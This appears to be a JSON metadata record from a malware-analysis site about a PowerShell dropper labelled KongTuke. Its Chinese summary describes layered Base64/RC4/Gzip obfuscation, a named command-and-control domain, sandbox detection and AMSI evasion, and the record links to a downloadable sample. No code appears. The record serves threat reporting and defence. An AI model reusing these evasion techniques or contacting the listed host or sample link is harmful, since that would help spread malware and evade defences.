{"id":"461b178002c7b29a53d9180efd455692","title":"KongTuke — KongTuke · dropper · PowerShell","md5":"461b178002c7b29a53d9180efd455692","sha256":"ddd7ff70971b9fe381d137218f80c998ca10100cd2a62d55daf962bf9f44c9f2","family":"KongTuke","apt":"Zirconium(APT31)","verdict":null,"sample_type":"dropper","lang":"PowerShell","file_format":"PowerShell","compiler":"PowerShell","published_at":"2026-07-03T16:00:00.000Z","summary":"PowerShell 编写的 KongTuke 4层嵌套投放器，归属 APT31 / Zirconium，首次检出 2026-07-04。核心特征: (1) 4层 Base64→RC4→Gzip→IEX 链式解混淆，每层独立RC4密钥; (2) C2通信 HTTPS POST tommy-m.lol/t，ABCD111/BCDA222前缀区分VM和域侦察信标; (3) 55+工具进程枚举反分析检测，覆盖 VMware/VirtualBox/QEMU/Sandboxie; (4) 字符串拼接绕过AMSI关键词扫描; (5) 最终载荷IEX执行C2响应，无完整性验证。家族归属 KongTuke v3 (APT31)，C2基于HTTPS。","url":"https://zseceye.com/report/461b178002c7b29a53d9180efd455692","json_url":"https://zseceye.com/report/461b178002c7b29a53d9180efd455692.json","html_url":"https://zseceye.com/report/461b178002c7b29a53d9180efd455692","hash_urls":{"md5":"https://zseceye.com/hash/461b178002c7b29a53d9180efd455692","sha256":"https://zseceye.com/hash/ddd7ff70971b9fe381d137218f80c998ca10100cd2a62d55daf962bf9f44c9f2"},"search_urls":{"md5":"https://zseceye.com/?q=461b178002c7b29a53d9180efd455692","sha256":"https://zseceye.com/?q=ddd7ff70971b9fe381d137218f80c998ca10100cd2a62d55daf962bf9f44c9f2"},"sample_download_url":"https://zseceye.com/report/461b178002c7b29a53d9180efd455692/sample","sample_filename":"ddd7ff70971b9fe3.zip","iocs":[],"ips":[]}